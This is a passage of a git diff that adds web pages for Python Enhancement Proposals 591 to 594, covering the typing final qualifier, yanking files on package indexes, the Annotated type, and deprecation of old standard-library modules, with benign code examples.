+ + + + + \ No newline at end of file diff --git a/pep-0591/index.html b/pep-0591/index.html new file mode 100644 index 00000000000..6345e680636 --- /dev/null +++ b/pep-0591/index.html @@ -0,0 +1,435 @@ + + + + + + + + PEP 591 – Adding a final qualifier to typing | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 591 – Adding a final qualifier to typing

+
+
Author:
+
Michael J. Sullivan <sully at msully.net>, Ivan Levkivskyi <levkivskyi at gmail.com>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
15-Mar-2019
+
Python-Version:
+
3.8
+
Post-History:
+

+
Resolution:
+
Typing-SIG message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see @final/@typing.final +and Final/typing.Final for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP proposes a “final” qualifier to be added to the typing +module—in the form of a final decorator and a Final type +annotation—to serve three related purposes:

+
    +
  • Declaring that a method should not be overridden
  • +
  • Declaring that a class should not be subclassed
  • +
  • Declaring that a variable or attribute should not be reassigned
  • +
+
+
+

Motivation

+
+

The final decorator

+

The current typing module lacks a way to restrict the use of +inheritance or overriding at a typechecker level. This is a common +feature in other object-oriented languages (such as Java), and is +useful for reducing the potential space of behaviors of a class, +easing reasoning.

+

Some situations where a final class or method may be useful include:

+
    +
  • A class wasn’t designed to be subclassed or a method wasn’t designed +to be overridden. Perhaps it would not work as expected, or be +error-prone.
  • +
  • Subclassing or overriding would make code harder to understand or +maintain. For example, you may want to prevent unnecessarily tight +coupling between base classes and subclasses.
  • +
  • You want to retain the freedom to arbitrarily change the class +implementation in the future, and these changes might break +subclasses.
  • +
+
+
+

The Final annotation

+

The current typing module lacks a way to indicate that a variable +will not be assigned to. This is a useful feature in several +situations:

+
    +
  • Preventing unintended modification of module and class level +constants and documenting them as constants in a checkable way.
  • +
  • Creating a read-only attribute that may not be overridden by +subclasses. (@property can make an attribute read-only but +does not prevent overriding)
  • +
  • Allowing a name to be used in situations where ordinarily a literal +is expected (for example as a field name for NamedTuple, a tuple +of types passed to isinstance, or an argument to a function +with arguments of Literal type (PEP 586)).
  • +
+
+
+
+

Specification

+
+

The final decorator

+

The typing.final decorator is used to restrict the use of +inheritance and overriding.

+

A type checker should prohibit any class decorated with @final +from being subclassed and any method decorated with @final from +being overridden in a subclass. The method decorator version may be +used with all of instance methods, class methods, static methods, and properties.

+

For example:

+
from typing import final
+
+@final
+class Base:
+    ...
+
+class Derived(Base):  # Error: Cannot inherit from final class "Base"
+    ...
+
+
+

and:

+
from typing import final
+
+class Base:
+    @final
+    def foo(self) -> None:
+        ...
+
+class Derived(Base):
+    def foo(self) -> None:  # Error: Cannot override final attribute "foo"
+                            # (previously declared in base class "Base")
+        ...
+
+
+

For overloaded methods, @final should be placed on the +implementation (or on the first overload, for stubs):

+
from typing import Any, overload
+
+class Base:
+    @overload
+    def method(self) -> None: ...
+    @overload
+    def method(self, arg: int) -> int: ...
+    @final
+    def method(self, x=None):
+        ...
+
+
+

It is an error to use @final on a non-method function.

+
+
+

The Final annotation

+

The typing.Final type qualifier is used to indicate that a +variable or attribute should not be reassigned, redefined, or overridden.

+
+

Syntax

+

Final may be used in one of several forms:

+
    +
  • With an explicit type, using the syntax Final[<type>]. Example:
    ID: Final[float] = 1
    +
    +
    +
  • +
  • With no type annotation. Example:
    ID: Final = 1
    +
    +
    +

    The typechecker should apply its usual type inference mechanisms to +determine the type of ID (here, likely, int). Note that unlike for +generic classes this is not the same as Final[Any].

    +
  • +
  • In class bodies and stub files you can omit the right hand side and just write +ID: Final[float]. If the right hand side is omitted, there must +be an explicit type argument to Final.
  • +
  • Finally, as self.id: Final = 1 (also optionally with a type in +square brackets). This is allowed only in __init__ methods, so +that the final instance attribute is assigned only once when an +instance is created.
  • +
+
+
+

Semantics and examples

+

The two main rules for defining a final name are:

+
    +
  • There can be at most one final declaration per module or class for +a given attribute. There can’t be separate class-level and instance-level +constants with the same name.
  • +
  • There must be exactly one assignment to a final name.
  • +
+

This means a type checker should prevent further assignments to final +names in type-checked code:

+
from typing import Final
+
+RATE: Final = 3000
+
+class Base:
+    DEFAULT_ID: Final = 0
+
+RATE = 300  # Error: can't assign to final attribute
+Base.DEFAULT_ID = 1  # Error: can't override a final attribute
+
+
+

Note that a type checker need not allow Final declarations inside loops +since the runtime will see multiple assignments to the same variable in +subsequent iterations.

+

Additionally, a type checker should prevent final attributes from +being overridden in a subclass:

+
from typing import Final
+
+class Window:
+    BORDER_WIDTH: Final = 2.5
+    ...
+
+class ListView(Window):
+    BORDER_WIDTH = 3  # Error: can't override a final attribute
+
+
+

A final attribute declared in a class body without an initializer must +be initialized in the __init__ method (except in stub files):

+
class ImmutablePoint:
+    x: Final[int]
+    y: Final[int]  # Error: final attribute without an initializer
+
+    def __init__(self) -> None:
+        self.x = 1  # Good
+
+
+

Type checkers should infer a final attribute that is initialized in +a class body as being a class variable. Variables should not be annotated +with both ClassVar and Final.

+

Final may only be used as the outermost type in assignments or variable +annotations. Using it in any other position is an error. In particular, +Final can’t be used in annotations for function arguments:

+
x: List[Final[int]] = []  # Error!
+
+def fun(x: Final[List[int]]) ->  None:  # Error!
+    ...
+
+
+

Note that declaring a name as final only guarantees that the name will +not be re-bound to another value, but does not make the value +immutable. Immutable ABCs and containers may be used in combination +with Final to prevent mutating such values:

+
x: Final = ['a', 'b']
+x.append('c')  # OK
+
+y: Final[Sequence[str]] = ['a', 'b']
+y.append('x')  # Error: "Sequence[str]" has no attribute "append"
+z: Final = ('a', 'b')  # Also works
+
+
+

Type checkers should treat uses of a final name that was initialized +with a literal as if it was replaced by the literal. For example, the +following should be allowed:

+
from typing import NamedTuple, Final
+
+X: Final = "x"
+Y: Final = "y"
+N = NamedTuple("N", [(X, int), (Y, int)])
+
+
+
+
+
+
+

Reference Implementation

+

The mypy [1] type checker supports Final and final. A +reference implementation of the runtime component is provided in the +typing_extensions [2] module.

+
+
+

Rejected/deferred Ideas

+

The name Const was also considered as the name for the Final +type annotation. The name Final was chosen instead because the +concepts are related and it seemed best to be consistent between them.

+

We considered using a single name Final instead of introducing +final as well, but @Final just looked too weird to us.

+

A related feature to final classes would be Scala-style sealed +classes, where a class is allowed to be inherited only by classes +defined in the same module. Sealed classes seem most useful in +combination with pattern matching, so it does not seem to justify the +complexity in our case. This could be revisited in the future.

+

It would be possible to have the @final decorator on classes +dynamically prevent subclassing at runtime. Nothing else in typing +does any runtime enforcement, though, so final will not either. +A workaround for when both runtime enforcement and static checking is +desired is to use this idiom (possibly in a support module):

+
if typing.TYPE_CHECKING:
+    from typing import final
+else:
+    from runtime_final import final
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0591.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0592/index.html b/pep-0592/index.html new file mode 100644 index 00000000000..c46f64585e3 --- /dev/null +++ b/pep-0592/index.html @@ -0,0 +1,310 @@ + + + + + + + + PEP 592 – Adding “Yank” Support to the Simple API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 592 – Adding “Yank” Support to the Simple API

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
07-May-2019
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding the ability to mark a particular file download +on a simple repository as “yanked”. Yanking a file allows authors to +effectively delete a file, without breaking things for people who have +pinned to exactly a specific version.

+

It also changes to the canonical source for the simple repository API to +the Simple Repository API reference document.

+
+
+

Motivation

+

Whenever a project detects that a particular release on PyPI might be +broken, they oftentimes will want to prevent further users from +inadvertently using that version. However, the obvious solution of +deleting the existing file from a repository will break users who have +followed best practices and pinned to a specific version of the project.

+

This leaves projects in a catch-22 situation where new projects may be +pulling down this known broken version, but if they do anything to +prevent that they’ll break projects that are already using it.

+

By allowing the ability to “yank” a file, but still make it available +for users who are explicitly asking for it, this allows projects to +mitigate the worst of the breakage while still keeping things working +for projects who have otherwise worked around or didn’t hit the +underlying issues.

+

One of the main scenarios where this may happen, is when dropping +support for a particular version of Python. The python-requires +metadata allows for dropping support for a version of Python in +a way that is not disruptive to users who are still using that +Python. However, a common mistake is to either omit or forget to +update that bit of metadata. When that mistake has been made, a +project really only has three options:

+
    +
  • Prevent that version from being installed through some mechanism +(currently, the only mechanism is by deleting the release entirely).
  • +
  • Re-release the version that worked as a higher version number, and +then re-release the version that dropped support as an even higher +version number with the correct metadata.
  • +
  • Do nothing, and document that people using that older Python have +to manually exclude that release.
  • +
+

With this PEP, projects can choose the first option, but with a +mechanism that is less likely to break the world for people who +are currently successfully using said project.

+
+
+

Specification

+

Links in the simple repository MAY have a data-yanked attribute +which may have no value, or may have an arbitrary string as a value. The +presence of a data-yanked attribute SHOULD be interpreted as +indicating that the file pointed to by this particular link has been +“Yanked”, and should not generally be selected by an installer, except +under specific scenarios.

+

The value of the data-yanked attribute, if present, is an arbitrary +string that represents the reason for why the file has been yanked. Tools +that process the simple repository API MAY surface this string to +end users.

+

The yanked attribute is not immutable once set, and may be rescinded in +the future (and once rescinded, may be reset as well). Thus API users +MUST be able to cope with a yanked file being “unyanked” (and even +yanked again).

+
+

Installers

+

The desirable experience for users is that once a file is yanked, when +a human being is currently trying to directly install a yanked file, that +it fails as if that file had been deleted. However, when a human did that +a while ago, and now a computer is just continuing to mechanically follow +the original order to install the now yanked file, then it acts as if it +had not been yanked.

+

An installer MUST ignore yanked releases, if the selection constraints +can be satisfied with a non-yanked version, and MAY refuse to use a +yanked release even if it means that the request cannot be satisfied at all. +An implementation SHOULD choose a policy that follows the spirit of the +intention above, and that prevents “new” dependencies on yanked +releases/files.

+

What this means is left up to the specific installer, to decide how to best +fit into the overall usage of their installer. However, there are two +suggested approaches to take:

+
    +
  1. Yanked files are always ignored, unless they are the only file that +matches a version specifier that “pins” to an exact version using +either == (without any modifiers that make it a range, such as +.*) or ===. Matching this version specifier should otherwise +be done as per PEP 440 for things like local versions, zero padding, +etc.
  2. +
  3. Yanked files are always ignored, unless they are the only file that +matches what a lock file (such as Pipfile.lock or poetry.lock) +specifies to be installed. In this case, a yanked file SHOULD not +be used when creating or updating a lock file from some input file or +command.
  4. +
+

Regardless of the specific strategy that an installer chooses for deciding +when to install yanked files, an installer SHOULD emit a warning when +it does decide to install a yanked file. That warning MAY utilize the +value of the data-yanked attribute (if it has a value) to provide more +specific feedback to the user about why that file had been yanked.

+
+
+

Mirrors

+

Mirrors can generally treat yanked files one of two ways:

+
    +
  1. They may choose to omit them from their simple repository API completely, +providing a view over the repository that shows only “active”, unyanked +files.
  2. +
  3. They may choose to include yanked files, and additionally mirror the +data-yanked attribute as well.
  4. +
+

Mirrors MUST NOT mirror a yanked file without also mirroring the +data-yanked attribute for it.

+
+
+
+

Rejected Ideas

+

A previous, undocumented, version of the simple repository API had +version specific pages, like /simple/<project>/<version>/. If +we were to add those back, the yanked files could only appear on +those pages and not on the version-less page at all. However this +would drastically reduce the cache-ability of the simple API and +would directly impact our ability to scale it out to handle all of +the incoming traffic.

+

A previous iteration of this PEP had the data-yanked attribute +act as a boolean value. However it was decided that allowing a +string both simplified the implementation, and provided additional +generalized functionality to allow projects to provide a mechanism +to indicate why they were yanking a release.

+

Another suggestion was to reserve some syntax in the arbitrary string +to allow us to evolve the standard in the future if we ever need to. +However, given we can add additional attributes in the future, this +idea has been rejected, favoring instead to use additional attributes +if the need ever arose.

+
+
+

Warehouse/PyPI Implementation Notes

+

While this PEP implements yanking at the file level, that is largely +due to the shape the simple repository API takes, not a specific +decision made by this PEP.

+

In Warehouse, the user experience will be implemented in terms of +yanking or unyanking an entire release, rather than as an operation on +individual files, which will then be exposed via the API as individual +files being yanked.

+

Other repository implementations may choose to expose this capability +in a different way, or not expose it at all.

+
+

Journal Handling

+

Whenever a release has been yanked, an entry will be recorded in the +journal using one of the following string patterns:

+
    +
  • yank release
  • +
  • unyank release
  • +
+

In both cases, the standard journal structure will indicate which release +of which project has been yanked or unyanked.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0592.rst

+

Last modified: 2024-06-18 17:55:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0593/index.html b/pep-0593/index.html new file mode 100644 index 00000000000..330279bffe0 --- /dev/null +++ b/pep-0593/index.html @@ -0,0 +1,401 @@ + + + + + + + + PEP 593 – Flexible function and variable annotations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 593 – Flexible function and variable annotations

+
+
Author:
+
Till Varoquaux <till at fb.com>, Konstantin Kashin <kkashin at fb.com>
+
Sponsor:
+
Ivan Levkivskyi <levkivskyi at gmail.com>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
26-Apr-2019
+
Python-Version:
+
3.9
+
Post-History:
+
20-May-2019
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Annotated and +typing.Annotated for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP introduces a mechanism to extend the type annotations from PEP +484 with arbitrary metadata.

+
+
+

Motivation

+

PEP 484 provides a standard semantic for the annotations introduced in +PEP 3107. PEP 484 is prescriptive but it is the de facto standard +for most of the consumers of annotations; in many statically checked +code bases, where type annotations are widely used, they have +effectively crowded out any other form of annotation. Some of the use +cases for annotations described in PEP 3107 (database mapping, +foreign languages bridge) are not currently realistic given the +prevalence of type annotations. Furthermore, the standardisation of type +annotations rules out advanced features only supported by specific type +checkers.

+
+
+

Rationale

+

This PEP adds an Annotated type to the typing module to decorate +existing types with context-specific metadata. Specifically, a type +T can be annotated with metadata x via the typehint +Annotated[T, x]. This metadata can be used for either static +analysis or at runtime. If a library (or tool) encounters a typehint +Annotated[T, x] and has no special logic for metadata x, it +should ignore it and simply treat the type as T. Unlike the +no_type_check functionality that currently exists in the typing +module which completely disables typechecking annotations on a function +or a class, the Annotated type allows for both static typechecking +of T (e.g., via mypy or Pyre, +which can safely ignore x) +together with runtime access to x within a specific application. The +introduction of this type would address a diverse set of use cases of interest +to the broader Python community.

+

This was originally brought up as issue 600 in the typing github +and then discussed in Python ideas.

+
+
+

Motivating examples

+
+

Combining runtime and static uses of annotations

+

There’s an emerging trend of libraries leveraging the typing annotations at +runtime (e.g.: dataclasses); having the ability to extend the typing annotations +with external data would be a great boon for those libraries.

+

Here’s an example of how a hypothetical module could leverage annotations to +read c structs:

+
UnsignedShort = Annotated[int, struct2.ctype('H')]
+SignedChar = Annotated[int, struct2.ctype('b')]
+
+class Student(struct2.Packed):
+    # mypy typechecks 'name' field as 'str'
+    name: Annotated[str, struct2.ctype("<10s")]
+    serialnum: UnsignedShort
+    school: SignedChar
+
+# 'unpack' only uses the metadata within the type annotations
+Student.unpack(record)
+# Student(name=b'raymond   ', serialnum=4658, school=264)
+
+
+
+
+

Lowering barriers to developing new typing constructs

+

Typically when adding a new type, a developer need to upstream that type to the +typing module and change mypy, PyCharm, Pyre, pytype, +etc… +This is particularly important when working on open-source code that +makes use of these types, seeing as the code would not be immediately +transportable to other developers’ tools without additional logic. As a result, +there is a high cost to developing and trying out new types in a codebase. +Ideally, authors should be able to introduce new types in a manner that allows +for graceful degradation (e.g.: when clients do not have a custom mypy plugin), which would lower the barrier to development and ensure some +degree of backward compatibility.

+

For example, suppose that an author wanted to add support for tagged unions to Python. One way to accomplish would be to annotate TypedDict in Python such that only one field is allowed +to be set:

+
Currency = Annotated[
+    TypedDict('Currency', {'dollars': float, 'pounds': float}, total=False),
+    TaggedUnion,
+]
+
+
+

This is a somewhat cumbersome syntax but it allows us to iterate on this +proof-of-concept and have people with type checkers (or other tools) that don’t +yet support this feature work in a codebase with tagged unions. The author could +easily test this proposal and iron out the kinks before trying to upstream tagged +union to typing, mypy, etc. Moreover, tools that do not have support for +parsing the TaggedUnion annotation would still be able to treat Currency +as a TypedDict, which is still a close approximation (slightly less strict).

+
+
+
+

Specification

+
+

Syntax

+

Annotated is parameterized with a type and an arbitrary list of +Python values that represent the annotations. Here are the specific +details of the syntax:

+
    +
  • The first argument to Annotated must be a valid type
  • +
  • Multiple type annotations are supported (Annotated supports variadic +arguments):
    Annotated[int, ValueRange(3, 10), ctype("char")]
    +
    +
    +
  • +
  • Annotated must be called with at least two arguments ( +Annotated[int] is not valid)
  • +
  • The order of the annotations is preserved and matters for equality +checks:
    Annotated[int, ValueRange(3, 10), ctype("char")] != Annotated[
    +    int, ctype("char"), ValueRange(3, 10)
    +]
    +
    +
    +
  • +
  • Nested Annotated types are flattened, with metadata ordered +starting with the innermost annotation:
    Annotated[Annotated[int, ValueRange(3, 10)], ctype("char")] == Annotated[
    +    int, ValueRange(3, 10), ctype("char")
    +]
    +
    +
    +
  • +
  • Duplicated annotations are not removed:
    Annotated[int, ValueRange(3, 10)] != Annotated[
    +    int, ValueRange(3, 10), ValueRange(3, 10)
    +]
    +
    +
    +
  • +
  • Annotated can be used with nested and generic aliases:
    Typevar T = ...
    +Vec = Annotated[List[Tuple[T, T]], MaxLen(10)]
    +V = Vec[int]
    +
    +V == Annotated[List[Tuple[int, int]], MaxLen(10)]
    +
    +
    +
  • +
+
+
+

Consuming annotations

+

Ultimately, the responsibility of how to interpret the annotations (if +at all) is the responsibility of the tool or library encountering the +Annotated type. A tool or library encountering an Annotated type +can scan through the annotations to determine if they are of interest +(e.g., using isinstance()).

+

Unknown annotations: When a tool or a library does not support +annotations or encounters an unknown annotation it should just ignore it +and treat annotated type as the underlying type. For example, when encountering +an annotation that is not an instance of struct2.ctype to the annotations +for name (e.g., Annotated[str, 'foo', struct2.ctype("<10s")]), the unpack +method should ignore it.

+

Namespacing annotations: Namespaces are not needed for annotations since +the class used by the annotations acts as a namespace.

+

Multiple annotations: It’s up to the tool consuming the annotations +to decide whether the client is allowed to have several annotations on +one type and how to merge those annotations.

+

Since the Annotated type allows you to put several annotations of +the same (or different) type(s) on any node, the tools or libraries +consuming those annotations are in charge of dealing with potential +duplicates. For example, if you are doing value range analysis you might +allow this:

+
T1 = Annotated[int, ValueRange(-10, 5)]
+T2 = Annotated[T1, ValueRange(-20, 3)]
+
+
+

Flattening nested annotations, this translates to:

+
T2 = Annotated[int, ValueRange(-10, 5), ValueRange(-20, 3)]
+
+
+
+
+

Interaction with get_type_hints()

+

typing.get_type_hints() will take a new argument include_extras that +defaults to False to preserve backward compatibility. When +include_extras is False, the extra annotations will be stripped +out of the returned value. Otherwise, the annotations will be returned +unchanged:

+
@struct2.packed
+class Student(NamedTuple):
+    name: Annotated[str, struct.ctype("<10s")]
+
+get_type_hints(Student) == {'name': str}
+get_type_hints(Student, include_extras=False) == {'name': str}
+get_type_hints(Student, include_extras=True) == {
+    'name': Annotated[str, struct.ctype("<10s")]
+}
+
+
+
+
+

Aliases & Concerns over verbosity

+

Writing typing.Annotated everywhere can be quite verbose; +fortunately, the ability to alias annotations means that in practice we +don’t expect clients to have to write lots of boilerplate code:

+
T = TypeVar('T')
+Const = Annotated[T, my_annotations.CONST]
+
+class C:
+    def const_method(self: Const[List[int]]) -> int:
+        ...
+
+
+
+
+
+

Rejected ideas

+

Some of the proposed ideas were rejected from this PEP because they would +cause Annotated to not integrate cleanly with the other typing annotations:

+
    +
  • Annotated cannot infer the decorated type. You could imagine that +Annotated[..., Immutable] could be used to mark a value as immutable +while still inferring its type. Typing does not support using the +inferred type anywhere else; it’s best to not add this as a +special case.
  • +
  • Using (Type, Ann1, Ann2, ...) instead of +Annotated[Type, Ann1, Ann2, ...]. This would cause confusion when +annotations appear in nested positions (Callable[[A, B], C] is too similar +to Callable[[(A, B)], C]) and would make it impossible for constructors to +be passthrough (T(5) == C(5) when C = Annotation[T, Ann]).
  • +
+

This feature was left out to keep the design simple:

+
    +
  • Annotated cannot be called with a single argument. Annotated could support +returning the underlying value when called with a single argument (e.g.: +Annotated[int] == int). This complicates the specifications and adds +little benefit.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0593.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0594/index.html b/pep-0594/index.html new file mode 100644 index 00000000000..08c195186c7 --- /dev/null +++ b/pep-0594/index.html @@ -0,0 +1,1022 @@ + + + + + + + + PEP 594 – Removing dead batteries from the standard library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 594 – Removing dead batteries from the standard library

+
+
Author:
+
Christian Heimes <christian at python.org>, +Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-May-2019
+
Python-Version:
+
3.11
+
Post-History:
+
21-May-2019, 04-Feb-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposed a list of standard library modules to be removed from the +standard library. The modules are mostly historic data formats (e.g. Commodore +and SUN file formats), APIs and operating systems that have been superseded a +long time ago (e.g. Mac OS 9), or modules that have security implications and +better alternatives (e.g. password and login).

+

The PEP follows in the footsteps of other PEPS like PEP 3108. The +Standard Library Reorganization proposal removed a bunch of modules from +Python 3.0. In 2007, the PEP referred to maintenance burden as:

+
+
“Over the years, certain modules have become a heavy burden upon python-dev +to maintain. In situations like this, it is better for the module to be +given to the community to maintain to free python-dev to focus more on +language support and other modules in the standard library that do not take +up an undue amount of time and effort.”
+

The withdrawn PEP 206 from 2000 expresses issues with the Python standard +library in an unvarnished and forthright manner:

+
+
“[…] the standard library modules aren’t always the best choices for a +job. Some library modules were quick hacks (e.g. calendar, +commands), some were designed poorly and are now near-impossible to +fix (cgi), and some have been rendered obsolete by other, more complete +modules […].”
+
+
+

Rationale

+

Back in the early days of Python, the interpreter came with a large set of +useful modules. This was often referred to as “batteries included” +philosophy and was one of the cornerstones to Python’s success story. +Users didn’t have to figure out how to download and install separate +packages in order to write a simple web server or parse email.

+

Times have changed. With the introduction of PyPI (née Cheeseshop), setuptools, +and later pip, it became simple and straightforward to download and install +packages. Nowadays Python has a rich and vibrant ecosystem of third-party +packages. It’s pretty much standard to either install packages from PyPI or +use one of the many Python or Linux distributions.

+

On the other hand, Python’s standard library is piling up with cruft, unnecessary +duplication of functionality, and dispensable features. This is undesirable +for several reasons.

+
    +
  • Any additional module increases the maintenance cost for the Python core +development team. The team has limited resources, reduced maintenance cost +frees development time for other improvements.
  • +
  • Modules in the standard library are generally favored and seen as the +de facto solution for a problem. A majority of users only pick third-party +modules to replace a stdlib module, when they have a compelling reason, e.g. +lxml instead of xml. The removal of an unmaintained stdlib module +increases the chances of a community-contributed module to become widely +used.
  • +
  • A lean and mean standard library benefits platforms with limited resources +like devices with just a few hundred kilobyte of storage (e.g. BBC +Micro:bit). Python on mobile platforms like BeeWare or WebAssembly +(e.g. pyodide) also benefit from reduced download size.
  • +
+

The modules in this PEP have been selected for deprecation because their +removal is either least controversial or most beneficial. For example, +least controversial are 30-year-old multimedia formats like the sunau +audio format, which was used on SPARC and NeXT workstations in the late +1980s. The crypt module has fundamental flaws that are better solved +outside the standard library.

+

This PEP also designates some modules as not scheduled for removal. Some +modules have been deprecated for several releases or seem unnecessary at +first glance. However it is beneficial to keep the modules in the standard +library, mostly for environments where installing a package from PyPI is not +an option. This can be corporate environments or classrooms where external +code is not permitted without legal approval.

+
    +
  • The usage of FTP is declining, but some files are still provided over +the FTP protocol or hosters offer FTP to upload content. Therefore, +ftplib is going to stay.
  • +
  • The optparse and getopt modules are widely used. They are mature +modules with very low maintenance overhead.
  • +
  • According to David Beazley [5] the wave module is easy to teach to +kids and can make crazy sounds. Making a computer generate sounds is a +powerful and highly motivating exercise for a nine-year-old aspiring developer. +It’s a fun battery to keep.
  • +
+
+
+

Deprecation schedule

+
+

3.11

+

Starting with Python 3.11, deprecated modules will start issuing +DeprecationWarning. The estimated EOL of Python 3.10, the last +version without the warning, is October 2026.

+
+
+

3.12

+

There should be no specific change compared to Python 3.11. +This is the last version of Python with the deprecated modules, +with an estimated EOL of October 2028.

+
+
+

3.13

+

All modules deprecated by this PEP are removed from the main branch +of the CPython repository and are no longer distributed as part of Python.

+
+
+
+

Deprecated modules

+

The modules are grouped as data encoding, multimedia, network, OS interface, +and misc modules. The majority of modules are for old data formats or +old APIs. Some others are rarely useful and have better replacements on +PyPI, e.g. Pillow for image processing or NumPy-based projects to deal with +audio processing.

+ + ++++++++ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Table 1: Proposed modules deprecations
ModuleDeprecated inTo be removedAdded inHas maintainer?Replacement
aifc3.11 (3.0*)3.131993yes (inactive)-
asynchat3.6 (3.0*)3.121999yesasyncio
asyncore3.6 (3.0*)3.121999yesasyncio
audioop3.11 (3.0*)3.131992yes-
cgi3.11 (2.0**)3.131995no-
cgitb3.11 (2.0**)3.131995no-
chunk3.113.131999no-
crypt3.113.131994yes (inactive)legacycrypt, bcrypt, argon2-cffi, hashlib, passlib
imghdr3.113.131992nofiletype, puremagic, python-magic
mailcap3.113.131995no-
msilib3.113.132006no-
nntplib3.113.131992no-
nis3.11 (3.0*)3.131992no-
ossaudiodev3.113.132002no-
pipes3.113.131992nosubprocess
smtpd3.4.7, 3.5.43.122001yesaiosmtpd
sndhdr3.113.131994nofiletype, puremagic, python-magic
spwd3.113.132005nopython-pam
sunau3.11 (3.0*)3.131993no-
telnetlib3.11 (3.0*)3.131997notelnetlib3, Exscript
uu3.113.131994no-
xdrlib3.113.131992/1996no-
+

Some module deprecations proposed by PEP 3108 for 3.0 and PEP 206 for +2.0. The added in column illustrates, when a module was originally designed +and added to the standard library. The has maintainer column refers to the +expert index, a list of domain +experts and maintainers in the DevGuide.

+
+

Data encoding modules

+
+

uu and the uu encoding

+

The uu module provides +uuencode format, an old binary encoding format for email from 1980. The uu +format has been replaced by MIME. The uu codec is provided by the binascii +module. There’s also encodings/uu_codec.py which is a codec for the +same encoding; it should also be deprecated.

+
+
+

xdrlib

+

The xdrlib module supports +the Sun External Data Representation Standard. XDR is an old binary +serialization format from 1987. These days it’s rarely used outside +specialized domains like NFS.

+
+
+
+

Multimedia modules

+
+

aifc

+

The aifc module provides +support for reading and writing AIFF and AIFF-C files. The Audio Interchange +File Format is an old audio format from 1988 based on Amiga IFF. It was most +commonly used on the Apple Macintosh. These days only few specialized +application use AIFF.

+

A user disclosed [6] that the post production film industry makes heavy +use of the AIFC file format. The usage of the aifc module in closed source +and internal software was unknown prior to the first posting of this PEP. This +may be a compelling argument to keep the aifc module in the standard +library. The file format is stable and the module does not require much +maintenance. The strategic benefits for Python may outmatch the burden.

+
+
+

audioop

+

The audioop module +contains helper functions to manipulate raw audio data and adaptive +differential pulse-code modulated audio data. The module is implemented in +C without any additional dependencies. The aifc, sunau, and wave +modules depend on audioop for some operations.

+

The byteswap operation in the wave module can be substituted with little +extra work. In case aifc is not deprecated as well, a reduced version of +the audioop module is converted into a private implementation detail, +e.g. _audioop with byteswap, alaw2lin, ulaw2lin, lin2alaw, +lin2ulaw, and lin2adpcm.

+
+
+

chunk

+

The chunk module provides +support for reading and writing Electronic Arts’ Interchange File Format. +IFF is an old audio file format originally introduced for Commodore and +Amiga. The format is no longer relevant.

+
+
+

imghdr

+

The imghdr module is a +simple tool to guess the image file format from the first 32 bytes +of a file or buffer. It supports only a limited number of formats and +neither returns resolution nor color depth.

+
+
+

ossaudiodev

+

The ossaudiodev +module provides support for Open Sound System, an interface to sound +playback and capture devices. OSS was initially free software, but later +support for newer sound devices and improvements were proprietary. Linux +community abandoned OSS in favor of ALSA [1]. Some operating systems like +OpenBSD and NetBSD provide an incomplete [2] emulation of OSS.

+

To best of my knowledge, FreeBSD is the only widespread operating system +that uses Open Sound System as of today. The ossaudiodev hasn’t seen any +improvements or new features since 2003. All commits since 2003 are +project-wide code cleanups and a couple of bug fixes. It would be beneficial +for both FreeBSD community and core development, if the module would be +maintained and distributed by people that care for it and use it.

+

The standard library used to have more audio-related modules. The other +audio device interfaces (audiodev, linuxaudiodev, sunaudiodev) +were removed in 2007 as part of the PEP 3108 stdlib re-organization.

+
+
+

sndhdr

+

